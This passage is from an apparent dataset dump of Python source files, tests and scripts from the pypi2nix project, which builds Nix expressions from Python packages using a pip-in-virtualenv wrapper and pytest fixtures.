self.calculate_hash_value()\n return self._hash_value\n\n def calculate_hash_value(self) -> str:\n return prefetch_url(self.url, self.logger)\n\n\nclass PathSource:\n def __init__(self, path: str) -> None:\n self.path = path\n\n @property\n def _normalized_path(self) -> str:\n if os.path.isabs(self.path):\n return self.path\n else:\n head, tail = os.path.split(self.path)\n if head:\n return self.path\n else:\n return os.path.join(self.path, \".\")\n\n def nix_expression(self) -> str:\n return self._normalized_path\n" }, { "alpha_fraction": 0.576795220375061, "alphanum_fraction": 0.5797872543334961, "avg_line_length": 34.38823699951172, "blob_id": "bd1c7c69147173a4b3b3baf30887e5ef3952c0bc", "content_id": "cdd34dc3c3fd27cb3281d6b3fa6f81a144c30d0f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6016, "license_type": "no_license", "max_line_length": 88, "num_lines": 170, "path": "/src/pypi2nix/pip/virtualenv.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport os.path\nfrom contextlib import contextmanager\nfrom tempfile import TemporaryDirectory\nfrom typing import Dict\nfrom typing import Iterator\nfrom typing import List\nfrom typing import Optional\nfrom venv import EnvBuilder\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.path import Path\nfrom pypi2nix.pip import Pip\nfrom pypi2nix.pip import PipFailed\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\nfrom pypi2nix.utils import cmd\n\n\nclass VirtualenvPip(Pip):\n def __init__(\n self,\n logger: Logger,\n target_platform: TargetPlatform,\n target_directory: str,\n env_builder: EnvBuilder,\n requirement_parser: RequirementParser,\n no_index: bool = False,\n wheel_distribution_path: Optional[str] = None,\n find_links: List[str] = [],\n ) -> None:\n self.logger = logger\n self.target_platform = target_platform\n self.target_directory = target_directory\n self.env_builder = env_builder\n self.no_index = no_index\n self.wheel_distribution_path = wheel_distribution_path\n self.find_links = find_links\n self.requirement_parser = requirement_parser\n\n def prepare_virtualenv(self) -> None:\n self.env_builder.create(self.target_directory)\n self._execute_pip_command(\n [\"install\", self._wheel_requirement_name()] + self._maybe_index()\n )\n\n def download_sources(\n self, requirements: RequirementSet, target_directory: Path\n ) -> None:\n with self._requirements_file(requirements) as requirement_file:\n self._execute_pip_command(\n [\n \"download\",\n \"-r\",\n requirement_file,\n \"--dest\",\n str(target_directory),\n \"--no-binary\",\n \":all:\",\n ]\n + self._maybe_index()\n )\n\n def build_wheels(\n self,\n requirements: RequirementSet,\n target_directory: Path,\n source_directories: List[Path],\n ) -> None:\n with self._requirements_file(requirements) as requirement_file:\n source_dir_arguments: List[str] = []\n for source_directory in source_directories:\n source_dir_arguments.append(\"--find-links\")\n source_dir_arguments.append(str(source_directory))\n self._execute_pip_command(\n [\"wheel\", \"--wheel-dir\", str(target_directory), \"--no-index\"]\n + source_dir_arguments\n + [\"--requirement\", requirement_file]\n )\n\n def install(\n self,\n requirements: RequirementSet,\n source_directories: List[Path],\n target_directory: Path,\n ) -> None:\n with self._requirements_file(requirements) as requirements_file:\n 
source_directories_arguments = []\n for source_directory in source_directories:\n source_directories_arguments.append(\"--find-links\")\n source_directories_arguments.append(str(source_directory))\n self._execute_pip_command(\n [\n \"install\",\n \"--no-index\",\n \"--target\",\n str(target_directory),\n \"-r\",\n requirements_file,\n ]\n + source_directories_arguments\n )\n\n def freeze(self, python_path: List[Path]) -> str:\n return self._execute_pip_command([\"freeze\"], pythonpath=python_path)\n\n def _pip_path(self) -> str:\n return os.path.join(self.target_directory, \"bin\", \"pip\")\n\n def _execute_pip_command(\n self, arguments: List[str], pythonpath: List[Path] = []\n ) -> str:\n with self._explicit_pythonpath(pythonpath), self._set_environment_variable(\n {\"SOURCE_DATE_EPOCH\": \"315532800\",}\n ):\n returncode, output = cmd([self._pip_path()] + arguments, logger=self.logger)\n if returncode != 0:\n raise PipFailed(output=output)\n return output\n\n @contextmanager\n def _explicit_pythonpath(self, pythonpath: List[Path]) -> Iterator[None]:\n additional_paths = \":\".join(map(str, pythonpath))\n with self._set_environment_variable({\"PYTHONPATH\": additional_paths}):\n yield\n\n @contextmanager\n def _requirements_file(self, requirements: RequirementSet) -> Iterator[str]:\n with TemporaryDirectory() as directory:\n yield requirements.to_file(\n directory, self.target_platform, self.requirement_parser, self.logger\n ).processed_requirements_file_path()\n\n @contextmanager\n def _set_environment_variable(\n self, variables: Dict[str, Optional[str]]\n ) -> Iterator[None]:\n def set_environment(environment: Dict[str, Optional[str]]) -> None:\n for name, value in variables.items():\n if value is None:\n del os.environ[name]\n else:\n os.environ[name] = value\n\n old_environment = dict(os.environ)\n set_environment(variables)\n try:\n yield\n finally:\n for key, value in old_environment.items():\n os.environ[key] = value\n for key in os.environ.keys():\n if key not in old_environment:\n del os.environ[key]\n\n def _maybe_index(self) -> List[str]:\n arguments: List[str] = []\n if self.no_index:\n arguments.append(\"--no-index\")\n for link in self.find_links:\n arguments.append(\"--find-links\")\n arguments.append(link)\n return arguments\n\n def _wheel_requirement_name(self) -> str:\n if self.wheel_distribution_path is None:\n return \"wheel\"\n else:\n return self.wheel_distribution_path\n" }, { "alpha_fraction": 0.7573529481887817, "alphanum_fraction": 0.7573529481887817, "avg_line_length": 23.727272033691406, "blob_id": "7ac5e63888380a32eb5b018ce621eeea5290d70c", "content_id": "76b5c54f2bee93a7a375481e519da823b8500e13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 272, "license_type": "no_license", "max_line_length": 38, "num_lines": 11, "path": "/integrationtests/test_pynacl.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from unittest import expectedFailure\n\nfrom .framework import IntegrationTest\n\n\n@expectedFailure\nclass PynaclTestCase(IntegrationTest):\n name_of_testcase = \"pynacl\"\n requirements = [\"pynacl\"]\n external_dependencies = [\"libffi\"]\n explicit_build_directory = True\n" }, { "alpha_fraction": 0.6290202140808105, "alphanum_fraction": 0.6290202140808105, "avg_line_length": 28.065217971801758, "blob_id": "2aa13d005c7e9299939044a51084a31013628471", "content_id": "e9e2b60a48528dc18c4848d86c86316d4879f681", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "Python", "length_bytes": 1337, "license_type": "no_license", "max_line_length": 85, "num_lines": 46, "path": "/src/pypi2nix/package/metadata.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nfrom email.header import Header\nfrom email.parser import Parser as EmailParser\n\nfrom attr import attrib\nfrom attr import attrs\n\nfrom .exceptions import DistributionNotDetected\n\n\n@attrs\nclass PackageMetadata:\n name: str = attrib()\n\n @classmethod\n def from_package_directory(package_metadata, path: str) -> \"PackageMetadata\":\n builder = _PackageMetadataBuilder(path)\n return package_metadata(name=builder.name)\n\n\nclass _PackageMetadataBuilder:\n def __init__(self, path_to_directory: str) -> None:\n self.path_to_directory = path_to_directory\n self._name: str = \"\"\n\n self.build()\n\n @property\n def name(self) -> str:\n return self._name\n\n def build(self) -> None:\n pkg_info_file = os.path.join(self.path_to_directory, \"PKG-INFO\")\n try:\n with open(pkg_info_file) as f:\n parser = EmailParser()\n metadata = parser.parse(f)\n except FileNotFoundError:\n raise DistributionNotDetected(\n f\"Could not find PKG-INFO file in {self.path_to_directory}\"\n )\n self._name = metadata.get(\"name\")\n if isinstance(self._name, Header):\n raise DistributionNotDetected(\n \"Could not parse source distribution metadata, name detection failed\"\n )\n" }, { "alpha_fraction": 0.7008432149887085, "alphanum_fraction": 0.7096419334411621, "avg_line_length": 27.41319465637207, "blob_id": "a770c04f81d757c597848260a7c2ecf1f0ad8a3d", "content_id": "9d789b0c5c63a55c6a07e94bdeda434fa6fbe574", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8183, "license_type": "no_license", "max_line_length": 88, "num_lines": 288, "path": "/conftest.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport os.path\nimport pathlib\nimport venv\nfrom io import StringIO\nfrom typing import Any\nfrom typing import Generator\n\nimport pytest\n\nfrom pypi2nix.archive import Archive\nfrom pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.logger import StreamLogger\nfrom pypi2nix.nix import Nix\nfrom pypi2nix.package_source import PathSource\nfrom pypi2nix.path import Path\nfrom pypi2nix.pip import Pip\nfrom pypi2nix.pip import VirtualenvPip\nfrom pypi2nix.pypi import Pypi\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.requirements import Requirement\nfrom pypi2nix.sources import Sources\nfrom pypi2nix.target_platform import PlatformGenerator\nfrom pypi2nix.target_platform import TargetPlatform\nfrom pypi2nix.wheel import Wheel\nfrom pypi2nix.wheel_builder import WheelBuilder\nfrom unittests.package_generator import PackageGenerator\n\n\nclass MyInt(int):\n def tolles_feature(self):\n print(\"yo\")\n\n\nDATA_DIRECTORY = os.path.join(os.path.dirname(__file__), \"unittests\", \"data\")\n\n\n@pytest.fixture\ndef nix(logger: Logger) -> Nix:\n return Nix(logger)\n\n\n@pytest.fixture\ndef project_dir(tmpdir_factory: Any) -> str:\n path: pathlib.Path = tmpdir_factory.mktemp(\"package_source_directory\")\n return str(path)\n\n\n@pytest.fixture\ndef download_dir(project_dir: str) -> Path:\n path: str = os.path.join(project_dir, \"download\")\n os.makedirs(path)\n return Path(path)\n\n\n@pytest.fixture\ndef wheels_dir(project_dir: str) -> Path:\n path = os.path.join(project_dir, 
\"wheels\")\n os.makedirs(path)\n return Path(path)\n\n\n@pytest.fixture\ndef wheel_builder(\n pip: Pip,\n project_dir: str,\n logger: Logger,\n requirement_parser: RequirementParser,\n current_platform: TargetPlatform,\n base_dependency_graph: DependencyGraph,\n) -> WheelBuilder:\n base_dir = Path(project_dir)\n return WheelBuilder(\n pip=pip,\n download_directory=base_dir / \"downloads\",\n lib_directory=base_dir / \"lib\",\n wheel_directory=base_dir / \"wheels\",\n extracted_wheel_directory=base_dir / \"extracted-wheels\",\n logger=logger,\n requirement_parser=requirement_parser,\n target_platform=current_platform,\n base_dependency_graph=base_dependency_graph,\n )\n\n\n@pytest.fixture\ndef base_dependency_graph() -> DependencyGraph:\n return DependencyGraph()\n\n\n@pytest.fixture\ndef extracted_six_package(\n six_requirements: RequirementSet,\n wheel_builder: WheelBuilder,\n current_platform: TargetPlatform,\n logger: Logger,\n requirement_parser: RequirementParser,\n) -> str:\n wheels = wheel_builder.build(six_requirements)\n for wheel_directory in wheels:\n wheel = Wheel.from_wheel_directory_path(\n wheel_directory, current_platform, logger, requirement_parser\n )\n if wheel.name == \"six\":\n return wheel_directory\n raise Exception('Error when trying to build wheel for \"six == 1.12.0\"')\n\n\n@pytest.fixture\ndef six_requirements(\n current_platform: TargetPlatform, requirement_parser: RequirementParser\n) -> RequirementSet:\n requirements = RequirementSet(current_platform)\n requirements.add(requirement_parser.parse(\"six == 1.12.0\"))\n return requirements\n\n\n@pytest.fixture\ndef six_source_distribution_archive(data_directory: str) -> Archive:\n return Archive(path=os.path.join(data_directory, \"six-1.12.0.tar.gz\"))\n\n\n@pytest.fixture\ndef distribution_archive_for_jsonschema(data_directory: str) -> Archive:\n return Archive(path=os.path.join(data_directory, \"jsonschema-3.0.1.tar.gz\"))\n\n\n@pytest.fixture(params=(\"six == 1.12.0\", \"setuptools == 41.0.1\"))\ndef requirement(request: Any, requirement_parser: RequirementParser) -> Requirement:\n return requirement_parser.parse(request.param)\n\n\n@pytest.fixture\ndef setupcfg_package_wheel_path(data_directory: str) -> str:\n return os.path.join(data_directory, \"setupcfg_package-1.0-py3-none-any.whl\")\n\n\n@pytest.fixture\ndef setupcfg_package_wheel(\n setupcfg_package_wheel_path: str,\n logger: Logger,\n requirement_parser: RequirementParser,\n current_platform: TargetPlatform,\n) -> Wheel:\n archive = Archive(path=setupcfg_package_wheel_path)\n with archive.extracted_files() as directory:\n return Wheel.from_wheel_directory_path(\n os.path.join(directory, \"setupcfg_package-1.0.dist-info\"),\n current_platform,\n logger,\n requirement_parser,\n )\n\n\n@pytest.fixture\ndef pip(\n logger: Logger,\n current_platform: TargetPlatform,\n project_dir: str,\n wheel_distribution_archive_path: str,\n data_directory: str,\n requirement_parser: RequirementParser,\n package_source_directory: Path,\n) -> VirtualenvPip:\n pip = VirtualenvPip(\n logger=logger,\n target_platform=current_platform,\n target_directory=os.path.join(project_dir, \"pip-without-index-venv\"),\n env_builder=venv.EnvBuilder(with_pip=True),\n no_index=True,\n wheel_distribution_path=wheel_distribution_archive_path,\n find_links=[data_directory, str(package_source_directory)],\n requirement_parser=requirement_parser,\n )\n pip.prepare_virtualenv()\n return pip\n\n\n@pytest.fixture(params=(\"six-1.12.0.tar.gz\", \"jsonschema-3.0.1.tar.gz\"))\ndef 
source_distribution_archive(request: Any, data_directory: str) -> Archive:\n return Archive(path=os.path.join(data_directory, request.param))\n\n\n@pytest.fixture\ndef platform_generator(nix: Nix, logger: Logger) -> PlatformGenerator:\n return PlatformGenerator(nix, logger)\n\n\n@pytest.fixture\ndef current_platform(platform_generator: PlatformGenerator) -> TargetPlatform:\n platform = platform_generator.current_platform()\n if platform is None:\n raise Exception(\"Could not recognize current platform\")\n else:\n return platform\n\n\n@pytest.fixture\ndef test_txt_content():\n path = os.path.join(DATA_DIRECTORY, \"test.txt\")\n with open(path) as f:\n return f.read()\n\n\n@pytest.fixture\ndef test_tar_gz_path():\n return os.path.join(DATA_DIRECTORY, \"test.tar.gz\")\n\n\n@pytest.fixture\ndef test_zip_path() -> str:\n return os.path.join(DATA_DIRECTORY, \"test.zip\")\n\n\n@pytest.fixture\ndef test_tar_bz2_path() -> str:\n return os.path.join(DATA_DIRECTORY, \"test.tar.bz2\")\n\n\n@pytest.fixture\ndef data_directory() -> str:\n return DATA_DIRECTORY\n\n\n@pytest.fixture\ndef logger() -> Generator[Logger, None, None]:\n with StringIO() as f:\n yield StreamLogger(output=f)\n\n\n@pytest.fixture\ndef requirement_parser(logger):\n return RequirementParser(logger=logger)\n\n\n@pytest.fixture\ndef wheel_distribution_archive_path(data_directory):\n return os.path.join(data_directory, \"wheel-0.33.6-py2.py3-none-any.whl\")\n\n\n@pytest.fixture\ndef sources_for_test_packages(data_directory):\n sources = Sources()\n package_names = [\"setupcfg-package\", \"package1\", \"package2\", \"package3\", \"package4\"]\n for package_name in package_names:\n sources.add(\n package_name,\n PathSource(os.path.join(data_directory, f\"{package_name}-1.0.tar.gz\")),\n )\n return sources\n\n\n@pytest.fixture\ndef pypi(logger: Logger) -> Pypi:\n return Pypi(logger=logger)\n\n\n@pytest.fixture\ndef flit_wheel(data_directory, current_platform, logger, requirement_parser):\n path = os.path.join(data_directory, \"flit-1.3-py3-none-any.whl\")\n with Archive(path=path).extracted_files() as wheel_directory:\n return Wheel.from_wheel_directory_path(\n os.path.join(wheel_directory, \"flit-1.3.dist-info\"),\n current_platform,\n logger,\n requirement_parser,\n )\n\n\n@pytest.fixture\ndef package_source_directory(tmpdir_factory: Any) -> Path:\n path_as_str: str = str(tmpdir_factory.mktemp(\"package_source_directory\"))\n return Path(path_as_str)\n\n\n@pytest.fixture\ndef package_generator(\n package_source_directory: Path,\n logger: Logger,\n requirement_parser: RequirementParser,\n) -> PackageGenerator:\n return PackageGenerator(\n target_directory=pathlib.Path(str(package_source_directory)),\n requirement_parser=requirement_parser,\n logger=logger,\n )\n" }, { "alpha_fraction": 0.7439024448394775, "alphanum_fraction": 0.7439024448394775, "avg_line_length": 26.33333396911621, "blob_id": "17abe92a011e26790f3475809b5c0f271b139169", "content_id": "e4c744d158337ba0a12edac6755b14344fc1a9d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 164, "license_type": "no_license", "max_line_length": 44, "num_lines": 6, "path": "/integrationtests/test_local_path.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\n\nclass LocalPathTestCase(IntegrationTest):\n name_of_testcase = \"local_path\"\n requirements = [\"-e egg#egg=local_path\"]\n" }, { "alpha_fraction": 0.6497175097465515, "alphanum_fraction": 0.6497175097465515, 
"avg_line_length": 28.5, "blob_id": "f234ee7b34b25ff4c0aca9b7b9066c564428984d", "content_id": "7c9506dd3be56aa128ed94d6a51f019c112ff1af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 177, "license_type": "no_license", "max_line_length": 73, "num_lines": 6, "path": "/mypy/nix_prefetch_github/__init__.pyi", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Dict\nfrom typing import Optional\n\ndef nix_prefetch_github(\n owner: str, repo: str, prefetch: bool = ..., rev: Optional[str] = ...\n) -> Dict[str, str]: ...\n" }, { "alpha_fraction": 0.7406716346740723, "alphanum_fraction": 0.7453358173370361, "avg_line_length": 31.484848022460938, "blob_id": "f40e177ba8c38d462f10ad574951e92c1b86f244", "content_id": "837afc8411d014a0d448dfe31b2e24dd3077bcef", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1072, "license_type": "permissive", "max_line_length": 80, "num_lines": 33, "path": "/unittests/pip/test_freeze.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from pypi2nix.path import Path\nfrom pypi2nix.pip import Pip\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\n\nfrom ..switches import nix\n\n\n@nix\ndef test_freeze_on_empty_environment_yields_empty_file(pip: Pip):\n frozen_requirements = pip.freeze([])\n assert not frozen_requirements.strip()\n\n\n@nix\ndef test_freeze_respects_additional_python_path(\n pip: Pip,\n project_dir: str,\n current_platform: TargetPlatform,\n requirement_parser: RequirementParser,\n download_dir: Path,\n):\n prefix = Path(project_dir) / \"custom-prefix\"\n requirements = RequirementSet(current_platform)\n requirements.add(requirement_parser.parse(\"six\"))\n pip.download_sources(requirements, download_dir)\n pip.install(\n requirements, target_directory=prefix, source_directories=[download_dir]\n )\n freeze_without_six = pip.freeze([])\n freeze_with_six = pip.freeze(python_path=[prefix])\n assert len(freeze_without_six) < len(freeze_with_six)\n" }, { "alpha_fraction": 0.5952380895614624, "alphanum_fraction": 0.5952380895614624, "avg_line_length": 15.800000190734863, "blob_id": "669a2d661efaa2f366fdfd40a21be4ba937591a7", "content_id": "a061f594e6d731cb6cf84a8d12e549c502edf2ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 84, "license_type": "no_license", "max_line_length": 50, "num_lines": 5, "path": "/mypy/setuptools/__init__.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Any\n\n\ndef setup(*args, **kwargs) -> Any: # type: ignore\n ...\n" }, { "alpha_fraction": 0.9019607901573181, "alphanum_fraction": 0.9019607901573181, "avg_line_length": 50, "blob_id": "415e722f4f1c5f46e88da9400daaf64e00a08060", "content_id": "ca11f8ac589128c3dd0d786daedc525d34abea2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 102, "license_type": "no_license", "max_line_length": 50, "num_lines": 2, "path": "/src/pypi2nix/external_dependency_collector/__init__.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .collector import ExternalDependencyCollector\nfrom .lookup import RequirementDependencyRetriever\n" }, { "alpha_fraction": 0.6522043347358704, "alphanum_fraction": 0.6592022180557251, 
"avg_line_length": 30.755556106567383, "blob_id": "f59610b6aa0a7bb69eab2a12b7e6a7e591f5ab9d", "content_id": "e101f2e8e35508b6901a16523e7b55c692448424", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1429, "license_type": "no_license", "max_line_length": 84, "num_lines": 45, "path": "/scripts/prepare_test_data.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"This script prepares the test fixtures for the unittests of this package\"\n\nimport os\nimport os.path\nimport shutil\nimport subprocess\n\nfrom build_wheel import build_wheel\nfrom repository import ROOT\n\nwheel_target_directory = os.path.join(ROOT, \"unittests\", \"data\")\nTEST_PACKAGES = [\"setupcfg-package\", \"package1\", \"package2\", \"package3\", \"package4\"]\n\n\ndef build_test_package(package_name):\n package_name_with_underscores = package_name.replace(\"-\", \"_\")\n package_dir = os.path.join(ROOT, \"unittests\", \"data\", package_name)\n paths_to_delete = [\n f\"{package_name_with_underscores}.egg-info\",\n \"dist\",\n f\"{package_name}.tar.gz\",\n ]\n for path in paths_to_delete:\n shutil.rmtree(os.path.join(package_dir, \"path\"), ignore_errors=True)\n subprocess.run([\"python\", \"setup.py\", \"sdist\"], cwd=package_dir, check=True)\n shutil.copy(\n os.path.join(package_dir, \"dist\", f\"{package_name}-1.0.tar.gz\"),\n wheel_target_directory,\n )\n shutil.move(\n os.path.join(package_dir, \"dist\", f\"{package_name}-1.0.tar.gz\"),\n os.path.join(package_dir, f\"{package_name}.tar.gz\"),\n )\n build_wheel(wheel_target_directory, package_dir)\n\n\ndef download_flit_wheel():\n build_wheel(wheel_target_directory, \"flit==1.3\")\n\n\nif __name__ == \"__main__\":\n for test_package in TEST_PACKAGES:\n build_test_package(test_package)\n download_flit_wheel()\n" }, { "alpha_fraction": 0.6634615659713745, "alphanum_fraction": 0.7019230723381042, "avg_line_length": 28.714284896850586, "blob_id": "f6a8b8005f6f45845cd70f1cc3c742f38aa80572", "content_id": "c6f92dafcf817c3bc624929e724a8b5799855005", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 208, "license_type": "permissive", "max_line_length": 56, "num_lines": 7, "path": "/unittests/test_util_cmd.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from pypi2nix.logger import Logger\nfrom pypi2nix.utils import cmd\n\n\ndef test_consistent_output(logger: Logger):\n exit_code, output = cmd([\"seq\", \"5\"], logger=logger)\n assert output == \"1\\n2\\n3\\n4\\n5\\n\"\n" }, { "alpha_fraction": 0.7119784951210022, "alphanum_fraction": 0.7160161733627319, "avg_line_length": 27.576923370361328, "blob_id": "fc4d68d1b74d9ae7225aedefa095bdfd54ba355a", "content_id": "79407fb10fde5e408024780be746f871a2f0d2d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 743, "license_type": "no_license", "max_line_length": 73, "num_lines": 26, "path": "/scripts/update_python_packages.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport sys\nfrom typing import List\n\nfrom package_source import PackageSource\nfrom pypi2nix.logger import StreamLogger\nfrom pypi2nix.pypi import Pypi\nfrom pypi2nix.wheels import Index\n\n\ndef main():\n logger = StreamLogger(sys.stdout)\n pypi = Pypi(logger=logger)\n pip_requirements: List[str] = [\"setuptools\", \"wheel\", \"pip\"]\n git_requirements: List[str] = []\n 
index = Index(logger=logger)\n package_source = PackageSource(index=index, pypi=pypi, logger=logger)\n for requirement in pip_requirements:\n package_source.update_package_from_pip(requirement)\n for requirement in git_requirements:\n package_source.update_package_from_master(requirement)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.7011494040489197, "alphanum_fraction": 0.7011494040489197, "avg_line_length": 23.85714340209961, "blob_id": "56bebaa2b83c35999c96aa27b9c39d3acbb92e5b", "content_id": "6604aacc11e393531947f3407c8ec8384bff2416", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 348, "license_type": "no_license", "max_line_length": 48, "num_lines": 14, "path": "/integrationtests/test_scipy.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from unittest import expectedFailure\n\nfrom .framework import IntegrationTest\n\n\n@expectedFailure\nclass ScipyTestCase(IntegrationTest):\n name_of_testcase = \"scipy\"\n code_for_testing = [\"import scipy\"]\n requirements = [\"scipy\", \"numpy\"]\n external_dependencies = [\"gfortran\", \"blas\"]\n\n def setup_requires(self):\n return [\"numpy\"]\n" }, { "alpha_fraction": 0.5986754894256592, "alphanum_fraction": 0.7185430526733398, "avg_line_length": 24.593219757080078, "blob_id": "88e3ce0bc2414dadf16c8a32b07d698a30280007", "content_id": "ae80e4d1d37e6e9a73186bbd75a1f92d7fad9784", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1510, "license_type": "permissive", "max_line_length": 88, "num_lines": 59, "path": "/unittests/test_pypi.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.pypi import Pypi\n\nfrom .switches import nix\n\n\n@pytest.fixture\ndef pypi(logger: Logger):\n return Pypi(logger)\n\n\n@nix\ndef test_pypi_get_package_returns_package_with_correct_name(pypi):\n assert pypi.get_package(\"six\").name == \"six\"\n\n\n@nix\ndef test_pypi_get_package_returns_package_with_releases(pypi):\n assert pypi.get_package(\"six\").releases\n\n\n@nix\ndef test_pypi_gets_correct_source_release_for_package_version_with_only_source_release(\n pypi,\n):\n release = pypi.get_source_release(\"six\", \"0.9.0\")\n assert (\n release.sha256_digest\n == \"14fd1ed3dd0e1a46cc53b8fc890b5a3b11737515aeb7f42c3af9f38e8d8975d7\"\n )\n\n\n@nix\ndef test_pypi_gets_correct_source_release_for_package_with_multiple_release_types(pypi):\n release = pypi.get_source_release(\"six\", \"1.12.0\")\n assert (\n release.sha256_digest\n == \"d16a0141ec1a18405cd4ce8b4613101da75da0e9a7aec5bdd4fa804d0e0eba73\"\n )\n\n\n@nix\ndef test_pypi_gets_correct_source_release_for_radiotherm_1_2(pypi):\n release = pypi.get_source_release(\"radiotherm\", \"1.2\")\n assert (\n release.sha256_digest\n == \"e8a70e0cf38f21170a3a43d5de62954aa38032dfff20adcdf79dd6c39734b8cc\"\n )\n\n\n@nix\ndef test_pypi_gets_correct_source_release_for_setuptools_1_6_0(pypi):\n release = pypi.get_source_release(\"setuptools-scm\", \"1.6.0\")\n assert (\n release.sha256_digest\n == \"c4f1b14e4fcc7dd69287a6c0b571c889dd4970559c7fa0512b2311f1513d86f4\"\n )\n" }, { "alpha_fraction": 0.6531986594200134, "alphanum_fraction": 0.6767676472663879, "avg_line_length": 28.700000762939453, "blob_id": "44225cb9bbec77231ae14ff0ee7d923bad6176bd", "content_id": "b352a394eeb8b9b9535af64e1b2666cf5dbb5a76", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "Python", "length_bytes": 297, "license_type": "no_license", "max_line_length": 73, "num_lines": 10, "path": "/integrationtests/test_flake8.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\n\nclass Flake8TestCase(IntegrationTest):\n name_of_testcase = \"flake8\"\n code_for_testing = [\"import flake8\"]\n requirements = [\"flake8 == 3.7.7\"]\n\n def setup_requires(self):\n return [\"intreehooks\", \"pytest-runner\", \"setuptools-scm\", \"flit\"]\n" }, { "alpha_fraction": 0.646616518497467, "alphanum_fraction": 0.6478696465492249, "avg_line_length": 27.5, "blob_id": "7c95010f9bf15fbc43b0053a9461257bb508622e", "content_id": "75a1db7a3c8782a8c52f7a0a089ca8336fc897cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 798, "license_type": "no_license", "max_line_length": 66, "num_lines": 28, "path": "/src/pypi2nix/sources.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Dict\nfrom typing import List\nfrom typing import Tuple\n\nfrom pypi2nix.package_source import PackageSource\n\n\nclass Sources:\n def __init__(self) -> None:\n self.sources: Dict[str, PackageSource] = dict()\n\n def add(self, name: str, source: PackageSource) -> None:\n self.sources[name] = source\n\n def __contains__(self, item: str) -> bool:\n return item in self.sources\n\n def __getitem__(self, item_name: str) -> PackageSource:\n return self.sources[item_name]\n\n def update(self, other_sources: \"Sources\") -> None:\n self.sources = dict(self.sources, **other_sources.sources)\n\n def items(self) -> List[Tuple[str, PackageSource]]:\n return list(self.sources.items())\n\n def __len__(self) -> int:\n return len(self.sources)\n" }, { "alpha_fraction": 0.7567567825317383, "alphanum_fraction": 0.7567567825317383, "avg_line_length": 11.333333015441895, "blob_id": "b6849df99f3c8b06748ff892f63691b046c38eca", "content_id": "4259bc3e8ae2c098c9bd91bd39986392caf4b5b0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 37, "license_type": "permissive", "max_line_length": 21, "num_lines": 3, "path": "/unittests/switches.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import pytest\n\nnix = pytest.mark.nix\n" }, { "alpha_fraction": 0.6478599309921265, "alphanum_fraction": 0.6653696298599243, "avg_line_length": 26.052631378173828, "blob_id": "67701d79f61ebc942d5514c776f0f9dc3275573e", "content_id": "45df13bd480cfdbe947d876dfa08d2516039ed88", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 514, "license_type": "no_license", "max_line_length": 80, "num_lines": 19, "path": "/integrationtests/test_flake8_mercurial.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\nREVISION = \"a209fb6\"\n\n\nclass Flake8MercurialTestCase(IntegrationTest):\n name_of_testcase = \"flake8-mercurial\"\n code_for_testing = [\"import flake8\"]\n requirements = [\n \"-e hg+https://bitbucket.org/tarek/flake8@{revision}#egg=flake8\".format(\n revision=REVISION\n )\n ]\n\n def setup_requires(self):\n return [\"setuptools-scm\", \"pytest-runner\"]\n\n def 